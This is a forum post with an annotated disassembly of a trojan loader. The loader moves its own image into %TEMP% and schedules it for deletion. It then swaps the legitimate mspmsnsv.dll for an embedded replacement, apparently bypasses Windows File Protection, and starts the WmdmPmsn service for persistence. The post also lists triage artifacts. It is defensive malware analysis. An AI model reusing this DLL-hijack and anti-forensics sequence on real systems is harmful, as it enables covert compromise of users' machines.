Trojan.Win32.Vilsel.pra Loader部分简单分析
本帖最后由 是昔流芳 于 2011-2-14 18:58 编辑

今天手贱,看到个网站被挂马了,于是就把网马下载下来捏一捏.一开始分析的时候还挺怡然,分析到生成的DLL时就有些烦躁了.一看时间戳,09年11月的.运气真不是一般的好.把EXE部分的分析发上来吧,不多,半成品,勿笑.得赶作业去了......

Loader部分分析
; ---------------------------------------------------------------------------
; sub_004012B2 - loader entry (OllyDbg listing, x86-32, Windows, stdcall APIs +
; cdecl CRT/local helpers). 0x71C bytes of locals; six 0x104-byte (MAX_PATH)
; path buffers are explicitly zeroed at the top.
;
; NOTE(review): the forum stripped the square-bracketed memory operands from
; this paste ("and byte ptr , 0", "lea edi, dword ptr", "rep stos ... es:",
; "push dword ptr"). The operands are recovered below from the opcode bytes
; printed on each line (ModRM A5/BD/85 + disp32 => [ebp+disp32]) and given in
; the comments; the pasted instruction text itself is left unchanged.
;
; Locals (ebp-relative; each buffer is 0x104 bytes):
;   ebp-514  path of this loader          (GetModuleFileNameA)
;   ebp-410  %TEMP%                       (GetTempPathA)
;   ebp-208  %TEMP%<tickcount>.dat        (sprintf)
;   ebp-104  <sysdir>\mspmsnsv.dll
;   ebp-30C  <sysdir>\Thumbes.db
;   ebp-618  <sysdir>                     (filled, never referenced again here)
;   ebp-71C  <sysdir>\notepad.exe
;
; What the visible code does: moves its own image to %TEMP%\<tick>.dat and
; schedules that file for deletion at next boot; renames the legitimate
; mspmsnsv.dll to Thumbes.db; writes a replacement mspmsnsv.dll from data
; embedded at 00403004; then creates/starts service "WmdmPmsn" so the
; replacement gets loaded (mspmsnsv.dll is the ServiceDll of the Windows Media
; Device Manager service WmdmPmSN - confirm on the target OS version).
; Helpers 00401000 / 00401042 / 004010C2 / 0040118E / 004011D3 / 0040120F /
; 0040125A are NOT in this listing; their roles below are the original
; analyst's notes and are marked as unconfirmed.
;
; Triage artifacts: %TEMP%\<digits>.dat (collect before reboot - it is
; registered for deletion, typically via PendingFileRenameOperations),
; <sysdir>\Thumbes.db (the ORIGINAL DLL), a modified <sysdir>\mspmsnsv.dll,
; and service WmdmPmsn being (re)configured and started.
; ---------------------------------------------------------------------------
004012B2/$55 push ebp ; prologue, ebp-based frame
004012B3|.8BEC mov ebp, esp
004012B5|.81EC 1C070000 sub esp, 71C ; 0x71C bytes of locals (see header)
004012BB|.80A5 ECFAFFFF>and byte ptr , 0 ; [ebp-514] = 0 (80 A5 disp32 00): first byte of the "own path" buffer
004012C2|.53 push ebx ; save callee-saved registers
004012C3|.56 push esi
004012C4|.57 push edi
004012C5|.6A 40 push 40 ; 0x40 dwords for rep stos (push/pop is shorter than mov ecx,40)
004012C7|.33C0 xor eax, eax ; fill value 0
004012C9|.59 pop ecx ; ecx = 0x40
004012CA|.8DBD EDFAFFFF lea edi, dword ptr ; edi = [ebp-513] (8D BD disp32)
004012D0|.F3:AB rep stos dword ptr es: ; zero 0x100 bytes at ebp-513..ebp-414
004012D2|.80A5 F0FBFFFF>and byte ptr , 0 ; [ebp-410] = 0: first byte of the %TEMP% buffer (compiler interleaves the next init)
004012D9|.6A 40 push 40 ; count for the next rep stos
004012DB|.66:AB stos word ptr es: ; finish buffer 1: ebp-413..ebp-412
004012DD|.AA stos byte ptr es: ; ebp-411 -> buffer 1 is 0x104 bytes (MAX_PATH) in total
004012DE|.59 pop ecx ; ecx = 0x40
004012DF|.33C0 xor eax, eax
004012E1|.8DBD F1FBFFFF lea edi, dword ptr ; edi = [ebp-40F]
004012E7|.80A5 F8FDFFFF>and byte ptr , 0 ; [ebp-208] = 0: first byte of the "%TEMP%<tick>.dat" buffer
004012EE|.F3:AB rep stos dword ptr es: ; zero 0x100 bytes at ebp-40F
004012F0|.66:AB stos word ptr es:
004012F2|.AA stos byte ptr es: ; buffer 2 (ebp-410) done, 0x104 bytes
004012F3|.6A 40 push 40
004012F5|.33C0 xor eax, eax
004012F7|.59 pop ecx ; ecx = 0x40
004012F8|.8DBD F9FDFFFF lea edi, dword ptr ; edi = [ebp-207]
004012FE|.F3:AB rep stos dword ptr es: ; zero 0x100 bytes at ebp-207
00401300|.66:AB stos word ptr es:
00401302|.AA stos byte ptr es: ; buffer 3 (ebp-208) done, 0x104 bytes
00401303|.8D85 F0FBFFFF lea eax, dword ptr ; eax = [ebp-410]
00401309|.BE 04010000 mov esi, 104 ; esi = MAX_PATH; reused as BufSize for every path API below
0040130E|.50 push eax ; /Buffer = ebp-410
0040130F|.56 push esi ; |BufSize => 104 (260.)
00401310|.FF15 54204000 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA: ebp-410 = %TEMP% (with trailing backslash)
00401316|.FF15 50204000 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount: ms since boot, used only to build a unique-looking file name
0040131C|.50 push eax ; /<%d> = tick count
0040131D|.8D85 F0FBFFFF lea eax, dword ptr ; |eax = [ebp-410]
00401323|.50 push eax ; |<%s> = %TEMP%
00401324|.8D85 F8FDFFFF lea eax, dword ptr ; |eax = [ebp-208]
0040132A|.68 5C5A4000 push 00405A5C ; |format = "%s%d.dat"
0040132F|.50 push eax ; |s = ebp-208
00401330|.FF15 70204000 call dword ptr [<&MSVCRT.sprintf>] ; \sprintf(ebp-208, "%s%d.dat", %TEMP%, tick) -> %TEMP%<tick>.dat
00401336|.83C4 10 add esp, 10 ; cdecl cleanup, 4 args
00401339|.8D85 ECFAFFFF lea eax, dword ptr ; eax = [ebp-514]
0040133F|.56 push esi ; /BufSize = 0x104
00401340|.50 push eax ; |PathBuffer = ebp-514
00401341|.6A 00 push 0 ; |hModule = NULL -> the running executable itself
00401343|.FF15 4C204000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA: ebp-514 = full path of this loader
00401349|.8D85 F8FDFFFF lea eax, dword ptr ; eax = [ebp-208]
0040134F|.50 push eax ; /NewName = %TEMP%<tick>.dat
00401350|.8D85 ECFAFFFF lea eax, dword ptr ; |eax = [ebp-514]
00401356|.50 push eax ; |ExistingName = own path
00401357|.FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \MOVE (not copy) of the loader's own image into %TEMP%; a running image can usually be renamed within the same volume. "1634560.dat" in the original note is just that run's tick value - the name varies per run.
0040135D|.85C0 test eax, eax ; MoveFileA returns nonzero on success
0040135F|.74 11 je short 00401372 ; taken when MoveFileA FAILED (eax == 0). NOTE(review): the original annotation "jump if the copy succeeded" is inverted.
00401361|.6A 04 push 4 ; /Flags = MOVEFILE_DELAY_UNTIL_REBOOT
00401363|.8D85 F8FDFFFF lea eax, dword ptr ; |eax = [ebp-208]
00401369|.6A 00 push 0 ; |NewName = NULL: with DELAY_UNTIL_REBOOT this DELETES ExistingName at the next boot
0040136B|.50 push eax ; |ExistingName = %TEMP%<tick>.dat
0040136C|.FF15 44204000 call dword ptr [<&KERNEL32.MoveFileEx>; \self-removal at reboot (anti-forensics), reached only when the move above succeeded. The original note "copies itself after reboot" is wrong - nothing is copied.
00401372|> \BB 245A4000 mov ebx, 00405A24 ;ASCII "WmdmPmsn" - service name, kept in ebx for the service helpers below
00401377|.6A 08 push 8 ; strlen("WmdmPmsn")
00401379|.53 push ebx
0040137A|.E8 81FCFFFF call 00401000 ; sub_401000(str, len); body not in this listing. Called with (pointer, string length) twice - presumably an in-place string transform (de-obfuscation); confirm by reading 00401000.
0040137F|.6A 0C push 0C ; strlen("ADVAPI32.dll")
00401381|.68 145A4000 push 00405A14 ;ASCII "ADVAPI32.dll"
00401386|.E8 75FCFFFF call 00401000 ; same helper on the DLL name
0040138B|.80A5 FCFEFFFF>and byte ptr , 0 ; [ebp-104] = 0: first byte of the "<sysdir>\mspmsnsv.dll" buffer
00401392|.83C4 10 add esp, 10 ; cdecl cleanup for the two calls above (4 dwords)
00401395|.33C0 xor eax, eax
00401397|.8DBD FDFEFFFF lea edi, dword ptr ; edi = [ebp-103]
0040139D|.6A 40 push 40
0040139F|.80A5 F4FCFFFF>and byte ptr , 0 ; [ebp-30C] = 0: first byte of the "<sysdir>\Thumbes.db" buffer
004013A6|.59 pop ecx ; ecx = 0x40
004013A7|.80A5 E8F9FFFF>and byte ptr , 0 ; [ebp-618] = 0: first byte of the spare <sysdir> buffer
004013AE|.F3:AB rep stos dword ptr es: ; zero 0x100 bytes at ebp-103
004013B0|.66:AB stos word ptr es:
004013B2|.AA stos byte ptr es: ; buffer ebp-104 done
004013B3|.6A 40 push 40
004013B5|.33C0 xor eax, eax
004013B7|.59 pop ecx
004013B8|.8DBD F5FCFFFF lea edi, dword ptr ; edi = [ebp-30B]
004013BE|.F3:AB rep stos dword ptr es:
004013C0|.66:AB stos word ptr es:
004013C2|.AA stos byte ptr es: ; buffer ebp-30C done
004013C3|.6A 40 push 40
004013C5|.33C0 xor eax, eax
004013C7|.59 pop ecx
004013C8|.8DBD E9F9FFFF lea edi, dword ptr ; edi = [ebp-617]
004013CE|.F3:AB rep stos dword ptr es:
004013D0|.66:AB stos word ptr es:
004013D2|.AA stos byte ptr es: ; buffer ebp-618 done
004013D3|.8B3D 40204000 mov edi, dword ptr [<&KERNEL32.GetSy>;edi = kernel32.GetSystemDirectoryA, called four times below
004013D9|.8D85 FCFEFFFF lea eax, dword ptr ; eax = [ebp-104]
004013DF|.56 push esi ; /BufSize = 0x104
004013E0|.50 push eax ; |Buffer = ebp-104
004013E1|.FFD7 call edi ; \GetSystemDirectoryA: ebp-104 = <sysdir> (e.g. C:\WINDOWS\system32)
004013E3|.8D85 E8F9FFFF lea eax, dword ptr ; eax = [ebp-618]
004013E9|.56 push esi ; /BufSize
004013EA|.50 push eax ; |Buffer = ebp-618
004013EB|.FFD7 call edi ; \GetSystemDirectoryA - this copy is not referenced again in this function
004013ED|.8D85 E4F8FFFF lea eax, dword ptr ; eax = [ebp-71C] (never explicitly zeroed; the API NUL-terminates)
004013F3|.56 push esi ; /BufSize
004013F4|.50 push eax ; |Buffer = ebp-71C
004013F5|.FFD7 call edi ; \GetSystemDirectoryA
004013F7|.8D85 E4F8FFFF lea eax, dword ptr ; eax = [ebp-71C]
004013FD|.68 4C5A4000 push 00405A4C ; /src = "\notepad.exe"
00401402|.50 push eax ; |dest = ebp-71C
00401403|.E8 BE000000 call <jmp.&MSVCRT.strcat> ; \ebp-71C = <sysdir>\notepad.exe (unbounded strcat into a 0x104-byte buffer; harmless here since <sysdir> is short)
00401408|.59 pop ecx ; cdecl cleanup for strcat, done as two pop ecx
00401409|.8D85 F4FCFFFF lea eax, dword ptr ; eax = [ebp-30C]
0040140F|.59 pop ecx
00401410|.56 push esi ; BufSize
00401411|.50 push eax ; Buffer = ebp-30C
00401412|.FFD7 call edi ; GetSystemDirectoryA: ebp-30C = <sysdir>
00401414|.8D85 FCFEFFFF lea eax, dword ptr ; eax = [ebp-104]
0040141A|.68 3C5A4000 push 00405A3C ; /src = "\mspmsnsv.dll"
0040141F|.50 push eax ; |dest = ebp-104
00401420|.E8 A1000000 call <jmp.&MSVCRT.strcat> ; \ebp-104 = <sysdir>\mspmsnsv.dll - the legitimate Windows Media Device Manager service DLL that gets replaced below
00401425|.8D85 F4FCFFFF lea eax, dword ptr ; eax = [ebp-30C]
0040142B|.68 305A4000 push 00405A30 ; /src = "\Thumbes.db"
00401430|.50 push eax ; |dest = ebp-30C
00401431|.E8 90000000 call <jmp.&MSVCRT.strcat> ; \ebp-30C = <sysdir>\Thumbes.db ("Thumbes" is a near-miss of Thumbs.db); this is where the ORIGINAL mspmsnsv.dll ends up - recover it from here
00401436|.53 push ebx ; "WmdmPmsn"
00401437|.E8 52FDFFFF call 0040118E ; sub_40118E(service name); body not in this listing. Original note: opens the Service Control Manager. Presumably it also stops the service - a ServiceDll still loaded in its host could not be renamed below; confirm.
0040143C|.83C4 14 add esp, 14 ; cdecl cleanup: two strcat (4) + sub_40118E (1) = 5 dwords
0040143F|.68 E8030000 push 3E8 ; /Timeout = 1000. ms
00401444|.FF15 3C204000 call dword ptr [<&KERNEL32.Sleep>] ; \1 s pause, plausibly to let the service stop settle before touching the DLL
0040144A|.8D85 FCFEFFFF lea eax, dword ptr ; eax = [ebp-104]
00401450|.50 push eax ; <sysdir>\mspmsnsv.dll
00401451|.E8 ECFBFFFF call 00401042 ; sub_401042(path); body not in this listing. Original note: string handling, loads sfc_os.dll and calls "resource 5". This is more likely export ORDINAL 5 of sfc_os.dll (commonly identified as the undocumented SfcFileException), which exempts the file from Windows File Protection so the replaced system DLL is not restored - confirm in 00401042.
00401456|.59 pop ecx ; cdecl cleanup (1 dword)
00401457|.8D85 F4FCFFFF lea eax, dword ptr ; eax = [ebp-30C]
0040145D|.50 push eax ; /NewName = <sysdir>\Thumbes.db
0040145E|.8D85 FCFEFFFF lea eax, dword ptr ; |eax = [ebp-104]
00401464|.50 push eax ; |ExistingName = <sysdir>\mspmsnsv.dll
00401465|.FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \renames (not copies) the real mspmsnsv.dll to Thumbes.db; the original is kept, presumably so the replacement can forward to it or it can be restored. Return value is not checked.
0040146B|.FF35 00304000 push dword ptr ; [00403000] (FF 35 disp32) - presumably the size of the embedded replacement DLL; confirm
00401471|.8D85 FCFEFFFF lea eax, dword ptr ; eax = [ebp-104]
00401477|.68 04304000 push 00403004 ; pointer into .data right after that dword - presumably the embedded DLL image; confirm
0040147C|.50 push eax ; <sysdir>\mspmsnsv.dll
0040147D|.E8 D8FDFFFF call 0040125A ; sub_40125A(path, data, size); body not in this listing. Original note: CreateFile and write -> drops the malicious mspmsnsv.dll in place of the real one
00401482|.8D85 E4F8FFFF lea eax, dword ptr ; eax = [ebp-71C]
00401488|.50 push eax ; <sysdir>\notepad.exe
00401489|.8D85 FCFEFFFF lea eax, dword ptr ; eax = [ebp-104]
0040148F|.50 push eax ; <sysdir>\mspmsnsv.dll
00401490|.E8 2DFCFFFF call 004010C2 ; sub_4010C2(dll path, notepad path); body not in this listing. Original note: opens mspmsnsv.dll and notepad.exe. Why notepad.exe is paired here is not visible; one common reason for such a pair is copying notepad's file timestamps onto the new DLL (timestomping) - confirm in 004010C2.
00401495|.53 push ebx ; "WmdmPmsn"
00401495|.53 push ebx ; LISTING ARTIFACT: the same address is pasted twice; only one push exists (add esp,1C below = 7 dwords = 3 + 2 + 1 + 1)
00401496|.E8 74FDFFFF call 0040120F ; sub_40120F(service name); body not in this listing. Original note: creates service WmdmPmSN and sets its start state - the persistence step (the service may already exist as a built-in one and is reconfigured)
0040149B|.53 push ebx ; "WmdmPmsn"
0040149C|.E8 32FDFFFF call 004011D3 ; sub_4011D3(service name); body not in this listing. Original note: starts service WmdmPmSN -> the service host loads the replaced mspmsnsv.dll
004014A1|.83C4 1C add esp, 1C ; cdecl cleanup: sub_40125A (3) + sub_4010C2 (2) + sub_40120F (1) + sub_4011D3 (1) = 7 dwords
004014A4|.5F pop edi ; restore callee-saved registers
004014A5|.5E pop esi
004014A6|.5B pop ebx
004014A7|.C9 leave ; esp = ebp; pop ebp
004014A8\.C3 retn ; no return value is used by the caller; the function exits after starting the service

后面的DLL是插入NotePad.exe然后下载其它木马,时间紧(马上开学了,你懂的),就没详细分析. :)

eee有空完整分析下吧.

不懂英文,呵呵,厉害。

支持教程!